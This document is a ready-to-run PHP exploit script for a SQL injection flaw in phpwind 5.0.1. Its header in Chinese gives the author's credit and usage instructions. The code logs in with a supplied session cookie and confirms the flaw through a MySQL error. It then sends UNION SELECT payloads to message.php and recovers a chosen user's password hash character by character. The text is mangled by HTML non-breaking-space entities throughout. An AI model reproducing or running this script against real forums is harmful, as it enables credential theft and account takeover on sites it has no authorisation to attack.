phpwind 5.0.1 SQL Injection Vulnerability Exploit

<?php print_r(\" +------------------------------------------------------------------+ phpwind&nbsp;5.0.1&nbsp;Sql注射漏洞利用程序 By&nbsp;loveshell[at]0x27.com 欢迎访问&nbsp;[http://www.0x27.com] 国内最专业最及时的web漏洞发放站点 用法:&nbsp;c:\\php5\\php.exe&nbsp;phpwindexp.php&nbsp;www.0x27.com&nbsp;/bbs/&nbsp;2 事先请修改下面的$cookie和$useragent项 Just&nbsp;For&nbsp;Fun&nbsp;:) +------------------------------------------------------------------+ \"); ini_set(\"max_execution_time\",0); error_reporting(7); $bbspath=\"$argv[2]\"; $server=\"$argv[1]\"; $cookie=\'aa102_c_stamp=1173176226;&nbsp;aa102_lastfid=0;&nbsp;aa102_ol_offset=47369;&nbsp;aa102_ipstate=1173162314;&nbsp;aa102_sid=f902d0ad;&nbsp;aa102_online1=yes;&nbsp;aa102_ck_info=%2F%09;&nbsp;aa102_winduser=AgYAOVRWCQNTC1QAAw4AWlAABFFSUVYMVVVbAFQGVFIGVlAH;&nbsp;aa102_lastvisit=0%091173176226%09%2Findex.php%3F\'; $useragent=\"Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;6.0;&nbsp;Windows&nbsp;NT&nbsp;5.1;&nbsp;SV1;&nbsp;.NET&nbsp;CLR&nbsp;2.0.50727;&nbsp;InfoPath.2;&nbsp;.NET&nbsp;CLR&nbsp;1.1.4322)\"; $uid=intval($argv[3])>0&nbsp;?&nbsp;intval($argv[3]):1; echo&nbsp;\"\\r\\n#Logging\\t........\"; if(islogin())&nbsp;echo&nbsp;\"Login&nbsp;Ok!\\r\\n\"; else&nbsp;die(\"Not&nbsp;Login!\\tCheck&nbsp;Your&nbsp;Cookie&nbsp;and&nbsp;Useragent!\\r\\n\"); echo&nbsp;\"#Testing\\t........\"; if(test())&nbsp;echo&nbsp;\"Vul!\\r\\n\"; else&nbsp;die(\"Not&nbsp;Vul\"); $hashtable=\'0123456789abcdef\'; $count=0; echo&nbsp;\"#Cracking\\t\\r\\n\\r\\n\"; for($i=1;$i<=16;$i++){ echo&nbsp;\"第\\t$i\\t位:\"; $subpass=crack($i+8); $password=$password.$subpass; echo&nbsp;\"$subpass\\r\\n\"; } echo&nbsp;\"Password:\\t$password\"; echo&nbsp;\"\\r\\nGood&nbsp;Luck&nbsp;$count&nbsp;Times\\r\\n\"; function&nbsp;send($cmd,$path) { &nbsp;global&nbsp;$bbspath,$server,$cookie,$count,$useragent,$debug,$evilip; &nbsp;$path=$bbspath.\"$path\"; &nbsp;$message&nbsp;=&nbsp;\"POST&nbsp;\".$path.\"&nbsp;HTTP/1.1\\r\\n\"; &nbsp;$message&nbsp;.=&nbsp;\"Accept:&nbsp;*/*\\r\\n\"; &nbsp;$message&nbsp;.=&nbsp;\"Accept-Language:&nbsp;zh-cn\\r\\n\"; &nbsp;$message&nbsp;.=&nbsp;\"Referer:&nbsp;http://\".$server.$path.\"\\r\\n\"; &nbsp;$message&nbsp;.=&nbsp;\"Content-Type:&nbsp;application/x-www-form-urlencoded\\r\\n\"; &nbsp;$message&nbsp;.=&nbsp;\"User-Agent:&nbsp;\".$useragent.\"\\r\\n\"; &nbsp;$message&nbsp;.=&nbsp;\"Host:&nbsp;\".$server.\"\\r\\n\"; &nbsp;$message&nbsp;.=&nbsp;\"Content-length:&nbsp;\".strlen($cmd).\"\\r\\n\"; &nbsp;$message&nbsp;.=&nbsp;\"Connection:&nbsp;Keep-Alive\\r\\n\"; &nbsp;$message&nbsp;.=&nbsp;\"Cookie:&nbsp;\".$cookie.\"\\r\\n\"; &nbsp;$message&nbsp;.=&nbsp;\"\\r\\n\"; &nbsp;$message&nbsp;.=&nbsp;$cmd.\"\\r\\n\"; &nbsp;$count=$count+1; &nbsp;$fd&nbsp;=&nbsp;fsockopen(&nbsp;$server,&nbsp;80&nbsp;); &nbsp;fputs($fd,$message); &nbsp;$resp&nbsp;=&nbsp;\"<pre>\"; &nbsp;while($fd&&!feof($fd))&nbsp;{ &nbsp;$resp&nbsp;.=&nbsp;fread($fd,1024); &nbsp;} &nbsp;fclose($fd); &nbsp;$resp&nbsp;.=\"</pre>\"; &nbsp;if($debug)&nbsp;{echo&nbsp;$cmd;echo&nbsp;$resp;} //&nbsp;echo&nbsp;$resp; &nbsp;return&nbsp;$resp; } function&nbsp;sqlject($sql){ global&nbsp;$uid; $data=\'action=pubmsg&readmsg=0)\'; $data=$data.\"&nbsp;union&nbsp;select&nbsp;BENCHMARK(1000000,md5(12345))&nbsp;from&nbsp;pw_members&nbsp;where&nbsp;uid=$uid&nbsp;and&nbsp;$sql\".\'/*\'; $echo=send($data,\'message.php\'); preg_match(\"/Total&nbsp;(.*)\\(/i\",$echo,$matches); if($matches[1]>2)&nbsp;return&nbsp;1; else&nbsp;return&nbsp;0; } function&nbsp;test(){ global&nbsp;$uid; $data=\'action=pubmsg&readmsg=0)\'; $echo=send($data,\'message.php\'); if(strpos($echo,\'MySQL&nbsp;Server&nbsp;Error\'))&nbsp;return&nbsp;1; else&nbsp;return&nbsp;0; } function&nbsp;islogin(){ global&nbsp;$uid; $data=\'action=pubmsg&readmsg=0)\'; $echo=send($data,\'message.php\'); if(strpos($echo,\'login.php\"\'))&nbsp;return&nbsp;0; else&nbsp;return&nbsp;1; } function&nbsp;crack($i){ global&nbsp;$hashtable; $sql=\"mid(password,$i,1)>0x\".bin2hex(\'8\'); if(sqlject($sql)){ $a=8; $b=15;} else&nbsp;{ $a=0; $b=8; } for($tmp=$a;$tmp<=$b;$tmp++){ $sql=\"mid(password,$i,1)=0x\".bin2hex($hashtable[$tmp]); if(sqlject($sql))&nbsp;return&nbsp;$hashtable[$tmp]; } crack($i); } ?>